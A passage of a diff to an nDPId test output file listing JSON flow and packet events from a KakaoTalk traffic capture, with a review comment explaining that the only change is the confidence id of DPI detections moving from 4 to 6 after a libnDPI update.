L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069170090,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1430069170090,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":164,"pkt_l4_len":128,"thread_ts_msec":1430069170090,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAJSUaEAAQAZSqQoYUrytwki8h34UbGWkOWcyCtXvgBgB1zgmAAABAQgKAALJQHWhBxYXAwEAW9BJTUK7bhQDJS6M4k2xveYn3KZ2THpi3b2p1WnyM44nZ0651+YzJehbLb+jV4nNEd4GZbKLQU+P8abQYninXFhPSKcNuFppnDwsImxNyj3HrOvurwOWRZpYp3o="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069170090,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069170090,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170892,"flow_last_seen":1430069170892,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069170892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1430069170892,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":122,"pkt_l4_len":86,"thread_ts_msec":1430069170892,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGoAAEAAPxHbOAoYUrwByQGuLDlaBQBWgNSByQAHC4ZVGZBlh61hMGy+mVz7szeLE04wAIGpUs16HTnaFQo\/DwShnbgrVUo6QPfO7hnIEQI6Zble8vC3moejgAAAAXwPCk3m1v5lftk="} 
-00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170892,"flow_last_seen":1430069170892,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069170892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170892,"flow_last_seen":1430069170892,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069170892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170975,"flow_last_seen":1430069170975,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069170975,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10269,"dst_port":23047,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 
00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1430069170975,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":122,"pkt_l4_len":86,"thread_ts_msec":1430069170975,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGoAAEAAQBHaOAoYUrwByQGuKB1aBwBWSf6ByQAHVJql2hcYBvUW09\/cV2PnqW9IAC+tkcS3zbxHaXzNy97m1tMPsxdrmxKMjQTBocmvV+MtI4fyJpYC3zCcgAAAAaPWslm6g8tl\/I8="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170975,"flow_last_seen":1430069170975,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069170975,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10269,"dst_port":23047,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170975,"flow_last_seen":1430069170975,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069170975,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10269,"dst_port":23047,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069171118,"flow_last_seen":1430069171118,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069171118,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11320,"dst_port":23044,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1430069171118,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":100,"pkt_l4_len":64,"thread_ts_msec":1430069171118,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFQAAEAAPxHbTgoYUrwByQGuLDhaBABATCmA7E6yizmc2guGVRn+xfaQv+g9g3ccEnajV1GbM8MpJWVK2C77CAiJwDoJYkgGCqWuS2HWMkwGeQ=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069171118,"flow_last_seen":1430069171118,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069171118,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11320,"dst_port":23044,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069171118,"flow_last_seen":1430069171118,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069171118,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11320,"dst_port":23044,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1430069171120,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":99,"pkt_l4_len":63,"thread_ts_msec":1430069171120,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFMAAEAAPxHbTwoYUrwByQGuLDhaBAA\/C92AbE6zizmgmguGVRkt\/rZnfXpGz0N2A\/IfJpewUyMSY166JO1xGXdEkGNQd31ADIw6ZS3SDh9Y"} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1430069171120,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":99,"pkt_l4_len":63,"thread_ts_msec":1430069171120,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFMAAEAAPxHbTwoYUrwByQGuLDhaBAA\/5SmAbE60izmkWguGVRmezvGSQL2r8\/lU9MEKvF6SC08uWokrFHcn2V7\/8UTxLNEjkf5mPRch1tsI"} 
00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1430069171127,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":122,"pkt_l4_len":86,"thread_ts_msec":1430069171127,"pkt":"AAACEgAAAAAAAAAAAAAIAEUoAGoAAEAAGxH\/EAHJAa4KGFK8WgUsOQBWReSByQAHVJql2hcYBvUW09\/cV2PnqW9IAC+tkcS3zbxHaXzNy97m1tMPsxdrmxKMjQTBocmvV+MtI4fyJpYC3zCcgAAAAaPWslm6g8tl\/I8="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069171389,"flow_last_seen":1430069171389,"flow_idle_time":200000,"flow_min_l4_payload_len":79,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":79,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1430069171389,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10268,"dst_port":23046,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1430069171389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":123,"pkt_l4_len":87,"thread_ts_msec":1430069171389,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGsAAEAAQBHaNwoYUrwByQGuKBxaBgBXWCuA7DE+fqkVA1Sapdp6cTmDebnhh8KUkQVLcfVIHO+KdE\/hh8TrsDi1pxsxiqViFSLVRYeZKeMWrEXQddUHKF8UZHmGznF9XlwFasBuVesU"} 
-00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069171389,"flow_last_seen":1430069171389,"flow_idle_time":200000,"flow_min_l4_payload_len":79,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":79,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1430069171389,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10268,"dst_port":23046,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069171389,"flow_last_seen":1430069171389,"flow_idle_time":200000,"flow_min_l4_payload_len":79,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":79,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1430069171389,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10268,"dst_port":23046,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00645{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1430069171425,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":192,"pkt_l4_len":156,"thread_ts_msec":1430069171425,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAALAAAEAAQBHZ8goYUrwByQGuKBxaBgCccR6AbDE\/fqkYw1SapdpQtIGDUUcsKy8FZc8SkcXbnkaLnkk7o+K31\/Lp8iVo3SBPJc3DyoRUtaFntc3koP5JLgEppFZXqNkw36nmYntuZ329GNTJ06T0XeyZJfDm34fzEotPLv3zEaM1kQ76cuJR6IF9rGbKT3sQKWcYIsd5M3XbqcXgkS4bFd8efSkCV9pxMGaMM2HU"} 
00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1430069171464,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":115,"pkt_l4_len":79,"thread_ts_msec":1430069171464,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGMAAEAAQBHaPwoYUrwByQGuKBxaBgBPG\/OAbDFAfqkcg1SapdrEmBFpbnVmJMblF0rZoL8vvV92uiSDpJJT7NfUzojI6pP2kn9ZuUksJi0oXTyacMa3Otx9PZKNJxznlw=="} 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1430069171998,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":142,"pkt_l4_len":106,"thread_ts_msec":1430069171998,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAH4AAEAAPxHbJAoYUrwByQGuLDlaBQBqX6qByAAMC4ZVGUMDyNdZMqzZvFL5masXDZVA6JQCTSwYzII6r0J+H6ebHDpiG6\/AGpupgF2zzgl2ppSiLVPnYiD98U8UjOQ2fRfyw\/ugiovyQFT+lfaAAAACkQQ8eHVaWMSL\/A=="} 
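Review bot: The only change in these `detected` and `detection-update` records is the key of the `confidence` object, which moves from `"4"` to `"6"` while the label stays `"DPI"`; the same rewrite repeats in the hunks at `@@ -60,7 +60,7 @@` and `@@ -76,18 +76,18 @@`. This suggests the libnDPI bump renumbered the confidence enum, so a consumer or detection rule that keys on the numeric id instead of the label would probably treat DPI-confirmed flows as a different confidence level without any error. The commit message does not mention the renumbering; a line such as `confidence ids renumbered by the libnDPI bump (DPI: 4 -> 6); match on the label, not the id` in the release notes or schema documentation would make the break visible. Whether the project's JSON schema constrains these keys cannot be seen from this hunk.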
@@ -60,7 +60,7 @@ 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1430069172127,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":142,"pkt_l4_len":106,"thread_ts_msec":1430069172127,"pkt":"AAACEgAAAAAAAAAAAAAIAEUoAH4AAEAAGhH\/\/AHJAa4KGFK8WgcoHQBqY8SByAAMC4ZVGUMDyNdZMqzZvFL5masXDZVA6JQCTSwYzII6r0J+H6ebHDpiG6\/AGpupgF2zzgl2ppSiLVPnYiD98U8UjOQ2fRfyw\/ugiovyQFT+lfaAAAACkQQ8eHVaWMSL\/A=="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069180329,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1430069180329,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069180329,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAENCkkAAQAbmZQoYUrzYOtyuwEEBuxTXAEVlWZivUBiMAAFrAAAVAwEAFnnuS9reX0mqADPiihp3NglZFsDnKQA="} 
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069180329,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069180329,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1470,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069193291,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1470,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1430069193291,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069193291,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACg66EAAjgYtFq38egEKGFK8AbvLm\/Ii35zxwsMTUBSkcjKfAAA="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2099,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069201833,"flow_last_seen":1430069201833,"flow_idle_time":7580000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069201833,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
@@ -76,18 +76,18 @@ 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2851,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1430069211639,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069211639,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxoAkAAQAZvaQoYUryt\/FiA6jIBuzJ1sXgAAAAAoAI2sGN\/AAACBAV4BAIICgAC2XoAAAAAAQMDBQ=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211640,"flow_last_seen":1430069211640,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069211640,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1430069211640,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":79,"pkt_l4_len":43,"thread_ts_msec":1430069211640,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAD\/Ze0AAQBH4oQoYUrwKvAEBYocANQAr1lVimAEAAAEAAAAAAAAEbXF0dAhmYWNlYm9vawNjb20AAAEAAQ=="} 
-00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211640,"flow_last_seen":1430069211640,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069211640,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"mqtt.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211640,"flow_last_seen":1430069211640,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069211640,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"mqtt.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2856,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1430069211703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069211703,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACy0dUAA+AZrBa38WIAKGFK8AbvqMmPPnoQydbF5YBIRHFG1AAACBAV4"} 